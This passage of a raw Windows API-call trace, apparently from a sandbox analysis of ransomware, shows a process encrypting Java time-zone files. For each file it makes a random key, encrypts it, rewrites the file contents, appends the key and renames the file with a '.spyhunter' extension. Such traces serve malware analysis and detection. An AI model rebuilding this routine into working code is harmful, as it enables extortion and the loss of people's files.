pdwDataLen=0x25ce4a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce4a8*=0x30) returned 1 [0170.099] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\North_Dakota\\New_Salem" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\north_dakota\\new_salem"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0170.100] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\North_Dakota\\New_Salem") returned 74 [0170.100] StrStrW (lpFirst="New_Salem", lpSrch=".txt") returned 0x0 [0170.100] GetProcessHeap () returned 0x2c0000 [0170.100] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0170.100] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce46c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce46c*=0x4fc, lpOverlapped=0x0) returned 1 [0170.181] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffb04, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0170.181] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x4fc, lpNumberOfBytesWritten=0x25ce46c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce46c*=0x4fc, lpOverlapped=0x0) returned 1 [0170.184] GetProcessHeap () returned 0x2c0000 [0170.184] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0170.184] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.185] WriteFile (in: hFile=0x178, lpBuffer=0x25ce4ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce46c, lpOverlapped=0x0 | out: lpBuffer=0x25ce4ac*, lpNumberOfBytesWritten=0x25ce46c*=0x4, lpOverlapped=0x0) returned 1 [0170.185] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce46c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce46c*=0x30, lpOverlapped=0x0) returned 1 [0170.185] CloseHandle (hObject=0x178) returned 1 [0170.185] GetProcessHeap () returned 0x2c0000 [0170.185] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0170.185] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\North_Dakota\\New_Salem.spyhunter") returned 84 [0170.185] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\North_Dakota\\New_Salem" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\north_dakota\\new_salem"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\North_Dakota\\New_Salem.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\north_dakota\\new_salem.spyhunter")) returned 1 [0170.187] GetProcessHeap () returned 0x2c0000 [0170.187] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0170.187] GetProcessHeap () returned 0x2c0000 [0170.187] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0170.187] GetProcessHeap () returned 0x2c0000 [0170.187] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee4b70 | out: hHeap=0x2c0000) returned 1 [0170.187] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce4a8 | out: pbBuffer=0x25ce4a8) returned 1 [0170.187] GetProcessHeap () returned 0x2c0000 [0170.187] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0170.187] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce4a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce4a0*=0x30) returned 1 [0170.187] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Nipigon" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\nipigon"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0170.188] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Nipigon") returned 59 [0170.188] StrStrW (lpFirst="Nipigon", lpSrch=".txt") returned 0x0 [0170.188] GetProcessHeap () returned 0x2c0000 [0170.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0170.188] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce464, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce464*=0x478, lpOverlapped=0x0) returned 1 [0170.194] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffb88, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0170.194] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x478, lpNumberOfBytesWritten=0x25ce464, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce464*=0x478, lpOverlapped=0x0) returned 1 [0170.194] GetProcessHeap () returned 0x2c0000 [0170.194] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0170.194] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.194] WriteFile (in: hFile=0x178, lpBuffer=0x25ce4a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce464, lpOverlapped=0x0 | out: lpBuffer=0x25ce4a4*, lpNumberOfBytesWritten=0x25ce464*=0x4, lpOverlapped=0x0) returned 1 [0170.194] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce464, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce464*=0x30, lpOverlapped=0x0) returned 1 [0170.194] CloseHandle (hObject=0x178) returned 1 [0170.194] GetProcessHeap () returned 0x2c0000 [0170.194] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0170.194] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Nipigon.spyhunter") returned 69 [0170.194] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Nipigon" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\nipigon"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Nipigon.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\nipigon.spyhunter")) returned 1 [0170.195] GetProcessHeap () returned 0x2c0000 [0170.195] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0170.195] GetProcessHeap () returned 0x2c0000 [0170.195] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0170.195] GetProcessHeap () returned 0x2c0000 [0170.195] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb9280 | out: hHeap=0x2c0000) returned 1 [0170.195] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce4a8 | out: pbBuffer=0x25ce4a8) returned 1 [0170.195] GetProcessHeap () returned 0x2c0000 [0170.195] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0170.196] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce4a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce4a0*=0x30) returned 1 [0170.196] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Nassau" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\nassau"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0170.196] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Nassau") returned 58 [0170.196] StrStrW (lpFirst="Nassau", lpSrch=".txt") returned 0x0 [0170.196] GetProcessHeap () returned 0x2c0000 [0170.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0170.196] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce464, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce464*=0x504, lpOverlapped=0x0) returned 1 [0170.308] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffafc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0170.308] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x504, lpNumberOfBytesWritten=0x25ce464, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce464*=0x504, lpOverlapped=0x0) returned 1 [0170.308] GetProcessHeap () returned 0x2c0000 [0170.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0170.309] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.310] WriteFile (in: hFile=0x178, lpBuffer=0x25ce4a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce464, lpOverlapped=0x0 | out: lpBuffer=0x25ce4a4*, lpNumberOfBytesWritten=0x25ce464*=0x4, lpOverlapped=0x0) returned 1 [0170.310] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce464, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce464*=0x30, lpOverlapped=0x0) returned 1 [0170.310] CloseHandle (hObject=0x178) returned 1 [0170.310] GetProcessHeap () returned 0x2c0000 [0170.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0170.310] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Nassau.spyhunter") returned 68 [0170.310] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Nassau" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\nassau"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Nassau.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\nassau.spyhunter")) returned 1 [0170.311] GetProcessHeap () returned 0x2c0000 [0170.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0170.311] GetProcessHeap () returned 0x2c0000 [0170.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0170.311] GetProcessHeap () returned 0x2c0000 [0170.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb91c0 | out: hHeap=0x2c0000) returned 1 [0170.311] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce4a0 | out: pbBuffer=0x25ce4a0) returned 1 [0170.311] GetProcessHeap () returned 0x2c0000 [0170.312] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0170.312] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce498*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce498*=0x30) returned 1 [0170.312] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Monterrey" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\monterrey"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0170.317] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Monterrey") returned 61 [0170.317] StrStrW (lpFirst="Monterrey", lpSrch=".txt") returned 0x0 [0170.317] GetProcessHeap () returned 0x2c0000 [0170.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0170.317] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce45c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce45c*=0x314, lpOverlapped=0x0) returned 1 [0170.395] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffcec, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0170.395] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x314, lpNumberOfBytesWritten=0x25ce45c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce45c*=0x314, lpOverlapped=0x0) returned 1 [0170.395] GetProcessHeap () returned 0x2c0000 [0170.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0170.395] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.395] WriteFile (in: hFile=0x178, lpBuffer=0x25ce49c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce45c, lpOverlapped=0x0 | out: lpBuffer=0x25ce49c*, lpNumberOfBytesWritten=0x25ce45c*=0x4, lpOverlapped=0x0) returned 1 [0170.395] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce45c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce45c*=0x30, lpOverlapped=0x0) returned 1 [0170.396] CloseHandle (hObject=0x178) returned 1 [0170.396] GetProcessHeap () returned 0x2c0000 [0170.396] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0170.396] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Monterrey.spyhunter") returned 71 [0170.396] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Monterrey" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\monterrey"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Monterrey.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\monterrey.spyhunter")) returned 1 [0170.398] GetProcessHeap () returned 0x2c0000 [0170.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0170.398] GetProcessHeap () returned 0x2c0000 [0170.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0170.398] GetProcessHeap () returned 0x2c0000 [0170.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed4cb8 | out: hHeap=0x2c0000) returned 1 [0170.398] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce4a0 | out: pbBuffer=0x25ce4a0) returned 1 [0170.398] GetProcessHeap () returned 0x2c0000 [0170.398] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0170.398] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce498*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce498*=0x30) returned 1 [0170.398] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Miquelon" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\miquelon"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0170.399] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Miquelon") returned 60 [0170.399] StrStrW (lpFirst="Miquelon", lpSrch=".txt") returned 0x0 [0170.399] GetProcessHeap () returned 0x2c0000 [0170.399] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0170.399] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce45c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce45c*=0x3a0, lpOverlapped=0x0) returned 1 [0170.456] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffc60, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0170.456] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x3a0, lpNumberOfBytesWritten=0x25ce45c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce45c*=0x3a0, lpOverlapped=0x0) returned 1 [0170.457] GetProcessHeap () returned 0x2c0000 [0170.457] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0170.457] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.457] WriteFile (in: hFile=0x178, lpBuffer=0x25ce49c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce45c, lpOverlapped=0x0 | out: lpBuffer=0x25ce49c*, lpNumberOfBytesWritten=0x25ce45c*=0x4, lpOverlapped=0x0) returned 1 [0170.457] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce45c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce45c*=0x30, lpOverlapped=0x0) returned 1 [0170.457] CloseHandle (hObject=0x178) returned 1 [0170.457] GetProcessHeap () returned 0x2c0000 [0170.457] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0170.457] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Miquelon.spyhunter") returned 70 [0170.457] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Miquelon" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\miquelon"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Miquelon.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\miquelon.spyhunter")) returned 1 [0170.459] GetProcessHeap () returned 0x2c0000 [0170.459] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0170.459] GetProcessHeap () returned 0x2c0000 [0170.459] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0170.459] GetProcessHeap () returned 0x2c0000 [0170.459] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed4bf0 | out: hHeap=0x2c0000) returned 1 [0170.459] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce498 | out: pbBuffer=0x25ce498) returned 1 [0170.459] GetProcessHeap () returned 0x2c0000 [0170.459] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0170.459] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce490*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce490*=0x30) returned 1 [0170.459] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Matamoros" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\matamoros"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0170.460] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Matamoros") returned 61 [0170.460] StrStrW (lpFirst="Matamoros", lpSrch=".txt") returned 0x0 [0170.461] GetProcessHeap () returned 0x2c0000 [0170.461] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0170.461] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce454, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce454*=0x314, lpOverlapped=0x0) returned 1 [0170.752] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffcec, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0170.752] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x314, lpNumberOfBytesWritten=0x25ce454, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce454*=0x314, lpOverlapped=0x0) returned 1 [0170.837] GetProcessHeap () returned 0x2c0000 [0170.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0170.837] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.837] WriteFile (in: hFile=0x178, lpBuffer=0x25ce494*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce454, lpOverlapped=0x0 | out: lpBuffer=0x25ce494*, lpNumberOfBytesWritten=0x25ce454*=0x4, lpOverlapped=0x0) returned 1 [0170.837] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce454, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce454*=0x30, lpOverlapped=0x0) returned 1 [0170.837] CloseHandle (hObject=0x178) returned 1 [0170.837] GetProcessHeap () returned 0x2c0000 [0170.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0170.837] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Matamoros.spyhunter") returned 71 [0170.837] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Matamoros" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\matamoros"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Matamoros.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\matamoros.spyhunter")) returned 1 [0170.842] GetProcessHeap () returned 0x2c0000 [0170.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0170.842] GetProcessHeap () returned 0x2c0000 [0170.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0170.842] GetProcessHeap () returned 0x2c0000 [0170.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed4808 | out: hHeap=0x2c0000) returned 1 [0170.842] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce498 | out: pbBuffer=0x25ce498) returned 1 [0170.842] GetProcessHeap () returned 0x2c0000 [0170.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0170.842] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce490*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce490*=0x30) returned 1 [0170.842] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Juneau" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\juneau"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0170.843] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Juneau") returned 58 [0170.843] StrStrW (lpFirst="Juneau", lpSrch=".txt") returned 0x0 [0170.843] GetProcessHeap () returned 0x2c0000 [0170.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0170.843] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce454, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce454*=0x4c8, lpOverlapped=0x0) returned 1 [0170.845] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffb38, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0170.845] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x4c8, lpNumberOfBytesWritten=0x25ce454, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce454*=0x4c8, lpOverlapped=0x0) returned 1 [0170.845] GetProcessHeap () returned 0x2c0000 [0170.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0170.845] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.845] WriteFile (in: hFile=0x178, lpBuffer=0x25ce494*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce454, lpOverlapped=0x0 | out: lpBuffer=0x25ce494*, 